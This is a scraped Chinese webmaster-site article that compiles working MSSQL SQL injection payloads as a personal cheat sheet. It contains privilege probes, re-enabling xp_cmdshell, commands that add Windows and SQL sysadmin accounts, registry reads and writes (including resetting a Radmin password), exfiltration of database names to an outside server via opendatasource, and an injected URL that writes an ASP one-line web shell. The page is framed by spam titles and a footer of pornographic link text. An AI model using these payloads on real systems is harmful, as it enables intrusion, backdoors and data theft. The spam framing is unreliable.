青草久久影院-青草久久伊人-青草久久久-青草久久精品亚洲综合专区-SM双性精跪趴灌憋尿调教H-SM脚奴调教丨踩踏贱奴

17站長網(wǎng)

17站長網(wǎng) 首頁 安全 腳本攻防 查看內(nèi)容

常用的一些注入命令總結(jié)!

2022-9-26 14:46| 查看: 2302 |來源: 互聯(lián)網(wǎng)

我記性不好,所以把常用的注入代碼記錄下來,有點亂,但對我來說,還算很有用,希望大家也會喜歡! //看看是什么權(quán)限的 and 1=(Select IS_MEMBER('db_owner')) And char(124)%2BCast(IS_MEMBER('db_owner') as varch
我記性不好,所以把常用的注入代碼記錄下來,有點亂,但對我來說,還算很有用,希望大家也會喜歡!

//看看是什么權(quán)限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//檢測是否有讀取某數(shù)據(jù)庫的權(quán)限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

數(shù)字類型
and char(124)%2Buser%2Bchar(124)=0

字符類型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索類型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用戶名
and user>0
' and user>0 and ''='

檢測是否為SA權(quán)限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

檢測是不是MSSQL數(shù)據(jù)庫
and exists (select * from sysobjects);--

檢測是否支持多行
;declare @d int;--

恢復(fù) xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

//-----------------------
// 執(zhí)行命令
//-----------------------
首先開啟沙盤模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb執(zhí)行系統(tǒng)命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

執(zhí)行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

判斷xp_cmdshell擴(kuò)展存儲過程是否存在:
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

寫注冊表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

REG_SZ

讀注冊表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

讀取目錄內(nèi)容
exec master..xp_dirtree 'c:\winnt\system32\',1,1

數(shù)據(jù)庫備份
backup database pubs to disk = 'c:\123.bak'

//爆出長度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--

更改sa口令方法:用sql綜合利用工具連接后,執(zhí)行命令:
exec sp_password NULL,'新密碼','sa'

添加和刪除一個SA權(quán)限的用戶test:
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin

刪除擴(kuò)展存儲過過程xp_cmdshell的語句:
exec sp_dropextendedproc 'xp_cmdshell'

添加擴(kuò)展存儲過過程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public

停掉或激活某個服務(wù)。

exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列某個目錄下的子目錄。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

dbo.xp_makecab

將目標(biāo)多個檔案壓縮到某個目標(biāo)檔案之內(nèi)。
所有要壓縮的檔案都可以接在參數(shù)列的最后方,以逗號隔開。

dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process

停掉某個執(zhí)行中的程序,但賦予的參數(shù)是 Process ID。
利用”工作管理員”,透過選單「檢視」-「選擇字段」勾選 pid,就可以看到每個執(zhí)行程序的 Process ID

xp_terminate_process 2484

xp_unpackcab

解開壓縮檔。

xp_unpackcab 'c:\test.cab','c:\temp',1


某機(jī),安裝了radmin,密碼被修改了,regedit.exe不知道被刪除了還是被改名了,net.exe不存在,沒有辦法使用regedit /e 導(dǎo)入注冊文件,但是mssql是sa權(quán)限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密碼為12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 則端口值改為1234

create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

//得到數(shù)據(jù)庫名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

//在Master中創(chuàng)建表,看看權(quán)限怎樣
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目錄里寫入一句話馬:
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

//更新表內(nèi)容
Update films SET kind = 'Dramatic' Where id = 123

//刪除內(nèi)容
delete from table_name where Stockid = 3
本文最后更新于 2022-9-26 14:46,某些文章具有時效性,若有錯誤或已失效,請在網(wǎng)站留言或聯(lián)系站長:17tui@17tui.com
·END·
站長網(wǎng)微信號:w17tui,關(guān)注站長、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營銷服務(wù)中心

免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識,文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請勿用于商業(yè)用途,如果損害了您的權(quán)利,請聯(lián)系我們及時修正或刪除。謝謝!

17站長網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級,為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨!

掃一掃,關(guān)注站長網(wǎng)微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 精精国产www视频在线观看免费 | 《乳色吐息》无删减版在线观看 | 在线 亚洲 日韩 欧洲视频 | 国产曰韩无码亚洲视频 | 久久精品国产eeuss | 一边喂奶一边做边爱 | 国产又粗又猛又爽又黄的免费视频 | 你是淫荡的我的女王 | 在线高清电影理论片4399 | 暖暖视频免费观看社区 | 日韩黄色软件 | 第九色区av天堂 | 月夜直播免费观看全集 | 日韩午夜欧美精品一二三四区 | 好吊妞国产欧美日韩视频 | av女优快播 | 影音先锋av丝袜天堂 | 亚洲人成www在线播放 | 俄罗斯mm | 久久re视频这里精品09免费 | 精品亚洲视频在线观看 | 99re热精品视频国产免费 | 伊人久久精品线影院 | 76人遣返航班上71人呈阳性 | 亚洲三级在线观看 | 超碰在线视频地址 | 不卡的在线AV网站 | 中文人妻熟妇精品乱又伧 | 99国产在线精品观看二区 | 少妇高潮A片特黄久久精品网 | 香蕉精品国产高清自在自线 | 久久香蕉国产线看观看 | 伊人色综合久久天天网 | 熟女人妻久久精品AV天堂 | 一一本之道高清视频在线观看中文字幕 | 成年人视频免费在线播放 | 色偷偷成人网免费视频男人的天堂 | 性吧 校园春色 | 国产精品久久久久久久久LI无码 | 国产精品99久久免费黑人人妻 | 99精品国产免费观看视频 |